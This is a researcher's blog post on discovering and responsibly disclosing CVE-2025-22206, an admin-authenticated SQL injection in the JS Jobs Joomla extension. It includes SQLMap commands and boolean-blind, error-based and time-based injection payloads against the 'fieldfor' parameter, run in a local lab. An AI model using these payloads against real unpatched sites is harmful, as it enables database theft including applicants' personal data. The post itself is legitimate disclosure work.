Obtaining My First CVE ID: CVE-2025-22206

CVE Feb 4, 2025

I set myself a personal goal for 2025. My goal was to conduct security research on a web application to discover an unknown vulnerability to then report my finding to the developer and have a CVE ID assigned to my discovery by a relevant CVE Numbering Authority (CNA).


During my research I discovered an SQL injection vulnerability in the JS Jobs extension versions 1.1.5-1.4.2 for Joomla that allows authenticated attackers (administrator) to execute arbitrary SQL commands via the 'fieldfor' parameter in the GDPR Field feature. This vulnerability is tracked as CVE-2025-22206.

Figure 1: JS Jobs (Joomla) v1.4.2 (latest)


The initial struggle to my research was knowing what type of vulnerabilities to look for and what kind of applications to target.

After reading the threat intelligence report by Group-IB on ResumeLooters, it gave me the idea to look for both SQLi and XSS as threat actors are evidently still actively hunting and exploiting these vulnerabilities in the wild to steal and sell data.

To start my research, I set up a Docker lab environment. I installed the latest version of Joomla locally, installed Burp Suite, and downloaded SQLMap.

The report also highlighted that the threat actors were actively targeting employment websites and retail companies. This gave me the idea to target the jobs & recruitment category of Joomla extensions.

JS Jobs (Joomla)

After looking through various extensions, JS Jobs stood out to me as it appeared to be feature-rich, had a lot of positive reviews from its users, and out of all the job & recruitment extensions, JS Jobs (Joomla) was the only one that was free to download.

What is the JS Jobs (Joomla) extension? As it says on the Joomla website, JS Jobs (developed by Joomsky) is a job board extension for any business, industry body, or staffing company wishing to establish an online presence. JS Jobs allows you to run your own, unique job classifieds service where you or an employer can advertise jobs and job seekers can upload their resumes (see Figure 2).

Figure 2: JS Jobs Joomla extension page

Proof of Concept

The penetration testing process for discovering this vulnerability started with reading the application's documentation, using Burp Suite to capture HTTP requests, and learning how to use the application.

After testing various parameters and input fields with different SQLi and XSS payloads, I discovered that the GDPR Fields 'fieldfor' parameter failed to properly sanitise user-supplied input making it vulnerable to SQLi.

To exploit this vulnerability, log in as the site administrator and go to 'Dashboard >> GDPR Fields >> + Add New Field >> Add Fields >> Field Title: test >> Field Text: test >> Save Fields' (see Figure 3).

Figure 3: Creating a test request

Then capture the Save Fields HTTP request with Burp Suite and save the request to a file (req.txt). Then run SQLMap through the file to exploit the SQLi vulnerability (see below).

python3 sqlmap.py -r req.txt -p fieldfor --dbms=mysql --batch --dbs

HTTP Request

POST /administrator/index.php HTTP/1.1
Host: localhost:8080
Content-Length: 364
Cache-Control: max-age=0
sec-ch-ua: "Not A(Brand";v="8", "Chromium";v="132"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: en-GB,en;q=0.9
Origin: http://localhost:8080
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/administrator/index.php
Accept-Encoding: gzip, deflate, br
Cookie: osColorScheme=dark; atumSidebarState=open; jsst_collapse_admin_menu=1; a3030abf7606e950783a31b16179a889=1c61b4c6f83b5569f9484c6888412100; f06339f02055c32957cf8cda32f8587f=48b5f4615da4721440ffe8ec49d08347
Connection: keep-alive

HTTP Request Captured with Burp Suite (req.txt)

SQLi Exploit

ubuntu@host:~/tools$ python3 sqlmap-dev/sqlmap.py -r ~/test/req.txt --batch --dbs

 ___ ___[']_____ ___ ___  {}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

Parameter: fieldfor (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: check=891b79eeac944c244b6331618aa0dac0&fieldtitle=test&termsandconditions_text=test&termsandconditions_linktype=0&termsandconditions_link=&id=&task=gdpr.savegdprfield&option=com_jsjobs&userfieldtype=termsandconditions&isuserfield=1&fieldfor=(SELECT (CASE WHEN (7446=7446) THEN 14 ELSE (SELECT 6203 UNION SELECT 9943) END))&published=1&required=1&isvisitorpublished=1&ordering=&created=&submit_app=Save Fields&891b79eeac944c244b6331618aa0dac0=1

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: check=891b79eeac944c244b6331618aa0dac0&fieldtitle=test&termsandconditions_text=test&termsandconditions_linktype=0&termsandconditions_link=&id=&task=gdpr.savegdprfield&option=com_jsjobs&userfieldtype=termsandconditions&isuserfield=1&fieldfor=14 AND GTID_SUBSET(CONCAT(0x71786a6271,(SELECT (ELT(6091=6091,1))),0x716a766b71),6091)&published=1&required=1&isvisitorpublished=1&ordering=&created=&submit_app=Save Fields&891b79eeac944c244b6331618aa0dac0=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: check=891b79eeac944c244b6331618aa0dac0&fieldtitle=test&termsandconditions_text=test&termsandconditions_linktype=0&termsandconditions_link=&id=&task=gdpr.savegdprfield&option=com_jsjobs&userfieldtype=termsandconditions&isuserfield=1&fieldfor=14 AND (SELECT 7659 FROM (SELECT(SLEEP(5)))kQDv)&published=1&required=1&isvisitorpublished=1&ordering=&created=&submit_app=Save Fields&891b79eeac944c244b6331618aa0dac0=1

available databases [3]:
[*] information_schema
[*] joomla_db
[*] performance_schema
SQLi Exploit POC

Exploit Demo

See the following video where I demonstrate how to exploit this vulnerability (see video below).


Exploit demo


After discovering the SQLi vulnerability in the JS Jobs (Joomla) extension and ensuring I could reproduce the exploit reliably, I informed the developer via their website of the discovery (28-01-2025). Within less than a day, they got back to me to let me know that they would be fixing the issue (see Figure 4).

Figure 4: The developer acknowledges my vulnerability report

After a few days, the developers informed me (see Figure 5) that they released version 1.4.3 on 31-01-2025 (see Figure 7), which fixes the SQLi vulnerability.

Figure 5: The developer confirms they have fixed the vulnerability

Once the developers confirmed the vulnerability had been patched, I re-tested the 'fieldfor' parameter using the below SQLMap command confirming the vulnerability had been patched (see Figure 6).

python3 ~/tools/sqlmap-dev/sqlmap.py -r /tmp/req.txt --batch -p fieldfor --dbms=mysql --level 5 --risk 3
Figure 6: Confirming the vulnerability has been patched
Figure 7: JS Jobs (Joomla) v1.4.3 update released

Requesting CVE ID

With the vulnerability now patched, I contacted the Joomla Security Strike Team (JSST) to ask for more information on how to request a CVE ID (see Figure 8).

Figure 8: Requesting a CVE ID from Joomla

Once confirmed, the Joomla Security Strike Team assigned (see Figure 9) my vulnerability discovery a reserved CVE ID of CVE-2025-22206 (see Figure 10).

Figure 9: CVE assigned
Figure 10: CVE-2025-22206 reserved

Finally, after Joomla confirmed with the developer that the vulnerability had been fixed and a version range was provided by the developer, CVE-2025-22206 was finally published (see Figure 11)!

Figure 11: CVE-2025-22206 published!


The SQL injection vulnerability was first publicly reported by Rain Forest Puppy on Phrack Magazine in Volume 8, Issue 54, Dec 25th, 1998, article 08 of 12. Despite SQLi being an almost 30-year-old vulnerability, many web applications still remain vulnerable, as evidenced in this blog post.

While this vulnerability (SQLi) requires administrator privileges to exploit, if an attacker is able to compromise an administrator account, they would have the ability to dump the entire database, including the resumes that were uploaded by job seekers.


Adam Wallwork

Adam is an up-and-coming security researcher who is always looking for new ways to grow, develop their knowledge and skills, and achieve new goals in cybersecurity.